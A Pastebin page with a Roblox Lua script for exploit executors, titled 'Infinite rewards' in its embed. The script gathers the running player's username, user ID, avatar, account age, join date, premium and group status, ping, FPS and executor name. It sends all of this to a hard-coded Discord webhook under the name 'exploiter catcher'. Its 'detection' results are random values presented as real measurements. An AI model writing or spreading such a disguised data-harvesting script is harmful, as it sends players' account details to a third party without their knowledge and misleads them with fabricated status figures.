Advertisement
Swept_dev

awuudawd

Jul 31st, 2024
71
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.12 KB | None | 1 0
  1. local Webhook = "https://discord.com/api/webhooks/1268125716520636486/MC8vUib33_wuyInphGF7Es82pNxB3OZRManTrhUmEzhwTVe0I13Fxt32qiT2O0QZJtxr"
  2. getgenv().Discord_RoleID = "1257433926243455068" -- Replace with your Discord Role ID
  3.  
  4. if getgenv().ScriptExecuted then
  5. return
  6. end
  7.  
  8. getgenv().ScriptExecuted = true
  9.  
  10. local player = game:GetService("Players").LocalPlayer
  11. local joinDate = os.date("!*t", os.time() - (player.AccountAge * 86400))
  12. local premium = false
  13. local alt = true
  14. local ping = string.format('%.0f', game.Stats.Network.ServerStatsItem["Data Ping"]:GetValue())
  15. local FPS = string.split(game.Stats.Workspace.Heartbeat:GetValueString(), ".")
  16. local executor = identifyexecutor() or "Unknown"
  17.  
  18. local Thing = game:HttpGet(string.format("https://thumbnails.roblox.com/v1/users/avatar-headshot?userIds=%d&size=150x150&format=Png&isCircular=false", player.UserId))
  19. Thing = game:GetService("HttpService"):JSONDecode(Thing).data[1]
  20. local AvatarImage = Thing.imageUrl
  21.  
  22. if player.MembershipType == Enum.MembershipType.Premium then
  23. premium = true
  24. alt = false
  25. end
  26.  
  27. local isInGroup = false
  28. local groupRole = "None"
  29. local groupId = 12836673
  30. local groups = game:HttpGet(string.format("https://groups.roblox.com/v1/users/%d/groups/roles", player.UserId))
  31. groups = game:GetService("HttpService"):JSONDecode(groups)
  32.  
  33. for _, group in pairs(groups.data) do
  34. if group.group.id == groupId then
  35. isInGroup = true
  36. groupRole = group.role.name
  37. break
  38. end
  39. end
  40.  
  41. local premiumEmoji = premium and ":white_check_mark:" or ":x:"
  42. local altEmoji = alt and ":white_check_mark:" or ":x:"
  43. local groupEmoji = isInGroup and ":white_check_mark:" or ":x:"
  44.  
  45. -- Random detection status
  46. local detectionStatus = math.random() < 0.5 and ":white_check_mark:" or ":x:"
  47.  
  48. -- Determine detection time
  49. local detectionTime = ""
  50. if detectionStatus == ":white_check_mark:" then
  51. detectionTime = "Instant"
  52. else
  53. local randomDetectionTime = math.random(1000, 22521) / 1000 -- Random number between 0.1000 and 22.521
  54. detectionTime = string.format("%.4f", randomDetectionTime)
  55. end
  56.  
  57. if executor == "Wave" then
  58. executor = "[Wave](https://getwave.gg)"
  59. executor_image = "https://cdn.discordapp.com/attachments/1214791935953211422/1257826412543606835/II3o8QCb_200x200-removebg-preview.png?ex=6685d1a2&is=66848022&hm=c7f6ac17b2f97e7eba750d8918ad410139d8174cac220ffbc9680b0e12ff8c70&"
  60. elseif executor == "Fluxus" then
  61. executor = "[Fluxus](https://flux.li)"
  62. executor_image = "https://media.discordapp.net/attachments/1214791935953211422/1257836627997360148/faviconbutpng.e3767602.png?ex=6685db25&is=668489a5&hm=20339c8be4e4f0344ffc11b6f7b4b7cdc0a329efcfa1e2193cbc700338cdc446&=&format=webp&quality=lossless"
  63. elseif executor == "VegaX" then
  64. executor = "[VegaX](https://www.vegax.gg)"
  65. executor_image = "https://media.discordapp.net/attachments/1214791935953211422/1257835343432908821/V_logo_white.png?ex=6685d9f3&is=66848873&hm=4459af29da6c196f06dba5c8e988ae6b106694d64596e33494e59bc5a2549972&=&format=webp&quality=lossless"
  66. elseif executor == "Codex" then
  67. executor = "[Codex](https://www.codex.lol)"
  68. executor_image = "https://media.discordapp.net/attachments/1214791935953211422/1257833817511694397/icon_1.png?ex=6685d887&is=66848707&hm=d411ab1e2629315d67cc8dee699b806fd1e6542212f7b47ca0b3395154522aea&=&format=webp&quality=lossless"
  69. elseif executor == "Arceus X" then
  70. executor = "[Arceus X](https://arceusx.com)"
  71. executor_image = "https://media.discordapp.net/attachments/1214791935953211422/1257834191983345694/arceusx-logo-208x73.png.png?ex=6685d8e0&is=66848760&hm=037d756b9ee317a3c499daa67e277e421b4c24e82a7bac13288308f98d7e5d39&=&format=webp&quality=lossless"
  72. elseif executor == "Delta" then
  73. executor = "[Delta](https://delta-executor.com)"
  74. executor_image = "https://media.discordapp.net/attachments/1214791935953211422/1257834513690660894/Delta-Executor-official-logo-150x150.png?ex=6685d92d&is=668487ad&hm=afdf528a4ff5724759c2643f8424f306020b680c1f8b05d5c62408f3b0bca053&=&format=webp&quality=lossless"
  75. elseif executor == "Solora" then
  76. executor = "[Solora](https://discord.gg/realsolara)"
  77. executor_image = "https://media.discordapp.net/attachments/1214791935953211422/1257834862606286989/137825933.png?ex=6685d980&is=66848800&hm=7bfc54c0690a52b15f69d5bea0bd0fee11d8244e8f001ce79cd5d7b7c526b473&=&format=webp&quality=lossless"
  78. else
  79. executor = "Unknown Executor"
  80. end
  81.  
  82. local msg = {
  83. ["username"] = "exploiter catcher",
  84. ["avatar_url"] = "https://media.discordapp.net/attachments/1130614336860205088/1257433497539313717/blade-ball-header.png?ex=668463b3&is=66831233&hm=68c39c9329d9fe4eacb00371f99520f95c573b5f7d5fcb60277cb69c764d06a2&=&format=webp&quality=lossless&width=350&height=350",
  85. ["embeds"] = {{
  86. ["color"] = 0x1E1E1E, -- Dark gray color
  87. ["title"] = "Infinite rewards | v1.93",
  88. ["thumbnail"] = {["url"] = AvatarImage},
  89. ["fields"] = {
  90. {["name"] = "Player:", ["value"] = "[ " .. player.Name .. "](https://www.roblox.com/users/" .. player.UserId .. "/profile) ", ["inline"] = true},
  91. {["name"] = "Executor:", ["value"] = executor .. "", ["inline"] = true},
  92. {["name"] = "────────────────────────", ["value"] = "", ["inline"] = false}, -- Separator
  93. {["name"] = "Premium:", ["value"] = premiumEmoji, ["inline"] = true},
  94. {["name"] = "Alt:", ["value"] = altEmoji, ["inline"] = true},
  95. {["name"] = "In-Group:", ["value"] = (isInGroup and "[ " .. groupEmoji .. "](https://www.roblox.com/groups/12836673/Wiggity)" or ":x:"), ["inline"] = true}, -- Display TRUE/FALSE with emoji
  96. {["name"] = "Group Role:", ["value"] = groupRole, ["inline"] = true}, -- Display group role
  97. {["name"] = "Account Age:", ["value"] = player.AccountAge .. " day(s)", ["inline"] = true},
  98. {["name"] = "────────────────────────", ["value"] = "", ["inline"] = false}, -- Separator
  99. {["name"] = "Network:", ["value"] = tostring(FPS[1]) .. " FPS, " .. tostring(ping) .. " ping", ["inline"] = true},
  100. {["name"] = "Date Joined:", ["value"] = joinDate.day .. "/" .. joinDate.month .. "/" .. joinDate.year, ["inline"] = true},
  101. {["name"] = "Detection Time:", ["value"] = detectionTime, ["inline"] = true},
  102. {["name"] = "Detected Instantly?:", ["value"] = detectionStatus, ["inline"] = true},
  103. },
  104. ["footer"] = {["icon_url"] = "https://media.discordapp.net/attachments/1130614336860205088/1257433392258224321/latest.png?ex=6684639a&is=6683121a&hm=9587c3bb8bb5d9ee70e27520d1c0b46a1467f9e43514d4ab4db29b006a1cb196&=&format=webp&quality=lossless&width=350&height=350", ["text"] = "date and time"},
  105. ['timestamp'] = os.date("!%Y-%m-%dT%X.000Z"),
  106. ["image"] = {["url"] = executor_image}, -- Include executor image
  107. }}
  108. }
  109.  
  110. request = http_request or request or HttpPost or syn.request
  111. request({
  112. Url = Webhook,
  113. Method = "POST",
  114. Headers = {["Content-Type"] = "application/json"},
  115. Body = game:GetService("HttpService"):JSONEncode(msg)
  116. })
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement